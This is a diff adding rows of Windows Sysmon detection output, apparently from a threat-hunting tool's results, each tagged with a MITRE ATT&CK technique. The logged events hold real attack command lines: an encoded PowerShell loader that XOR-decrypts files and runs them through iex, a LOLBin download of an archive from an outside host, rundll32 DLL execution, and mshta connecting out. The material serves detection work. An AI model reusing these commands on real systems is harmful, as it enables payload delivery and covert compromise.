+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1552853872.97915,2019-03-18T00:17:52.979150+04:00,,Threat,Low,Found User (PC04\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-17T20:17:52.949107Z"">
+    </TimeCreated>
+    <EventRecordID>5260</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1852"" ThreadID=""464"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC04.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-03-17 20:17:52.899</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AB70-5C8E-0000-0010781D0A00</Data>
+    <Data Name=""ProcessId"">3272</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\</Data>
+    <Data Name=""User"">PC04\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-A960-5C8E-0000-002004C00300</Data>
+    <Data Name=""LogonId"">0x3c004</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-A965-5C8E-0000-0010D9100400</Data>
+    <Data Name=""ParentProcessId"">3884</Data>
+    <Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
+  </EventData>
+</Event>",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1603490302.074619,2020-10-24T01:58:22.074619+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( &quot;C:\Windows\System32\rundll32.exe&quot; DATAUS~1.DLL f8755 4624665222 rd)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-23T21:58:22.066496Z"">
+    </TimeCreated>
+    <EventRecordID>424261</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3208"" ThreadID=""4804"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-23 21:58:22.062</Data>
+    <Data Name=""ProcessGuid"">747F3D96-51FE-5F93-0000-0010DC535E00</Data>
+    <Data Name=""ProcessId"">8920</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; DATAUS~1.DLL f8755 4624665222 rd</Data>
+    <Data Name=""CurrentDirectory"">C:\PROGRA~3\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
+    <Data Name=""LogonId"">0x8a619</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-51FD-5F93-0000-00103B425E00</Data>
+    <Data Name=""ParentProcessId"">7504</Data>
+    <Data Name=""ParentImage"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""ParentCommandLine"">rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490302.074619,2020-10-24T01:58:22.074619+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; DATAUS~1.DLL f8755 4624665222 rd ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-23T21:58:22.066496Z"">
+    </TimeCreated>
+    <EventRecordID>424261</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3208"" ThreadID=""4804"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-23 21:58:22.062</Data>
+    <Data Name=""ProcessGuid"">747F3D96-51FE-5F93-0000-0010DC535E00</Data>
+    <Data Name=""ProcessId"">8920</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; DATAUS~1.DLL f8755 4624665222 rd</Data>
+    <Data Name=""CurrentDirectory"">C:\PROGRA~3\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
+    <Data Name=""LogonId"">0x8a619</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-51FD-5F93-0000-00103B425E00</Data>
+    <Data Name=""ParentProcessId"">7504</Data>
+    <Data Name=""ParentImage"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""ParentCommandLine"">rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1603490302.074619,2020-10-24T01:58:22.074619+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; DATAUS~1.DLL f8755 4624665222 rd ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-23T21:58:22.066496Z"">
+    </TimeCreated>
+    <EventRecordID>424261</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3208"" ThreadID=""4804"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-23 21:58:22.062</Data>
+    <Data Name=""ProcessGuid"">747F3D96-51FE-5F93-0000-0010DC535E00</Data>
+    <Data Name=""ProcessId"">8920</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; DATAUS~1.DLL f8755 4624665222 rd</Data>
+    <Data Name=""CurrentDirectory"">C:\PROGRA~3\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
+    <Data Name=""LogonId"">0x8a619</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-51FD-5F93-0000-00103B425E00</Data>
+    <Data Name=""ParentProcessId"">7504</Data>
+    <Data Name=""ParentImage"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""ParentCommandLine"">rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920558.282154,2019-05-27T05:29:18.282154+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool &quot;Description: Cannot read configuration file due to insufficient permissions&quot; /text:processmodel.username ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:18.282154Z"">
+    </TimeCreated>
+    <EventRecordID>5919</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:18.232</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-00108C8EFF00</Data>
+    <Data Name=""ProcessId"">3144</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool &quot;Description: Cannot read configuration file due to insufficient permissions&quot; /text:processmodel.username</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1593766040.077424,2020-07-03T12:47:20.077424+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-07-03T08:47:20.037922Z"">
+    </TimeCreated>
+    <EventRecordID>305352</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3324"" ThreadID=""4016"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-07-03 08:47:20.001</Data>
+    <Data Name=""ProcessGuid"">747F3D96-F098-5EFE-0000-001012E13801</Data>
+    <Data Name=""ProcessId"">1932</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">cmd  /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr </Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-1CE4-5EFE-0000-0020CC9C0800</Data>
+    <Data Name=""LogonId"">0x89ccc</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-EF3D-5EFE-0000-0010F3653401</Data>
+    <Data Name=""ParentProcessId"">5384</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1560582872.809734,2019-06-15T11:14:32.809734+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.13 ) to hostname (  ) , IP ( 10.0.2.18 ) and port ( 4443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>3</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>3</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-06-15T07:13:44.106609Z"">
+    </TimeCreated>
+    <EventRecordID>7649</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2044"" ThreadID=""2088"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-06-15 07:13:42.577</Data>
+    <Data Name=""ProcessGuid"">365ABB72-9AA6-5D04-0000-00109C850F00</Data>
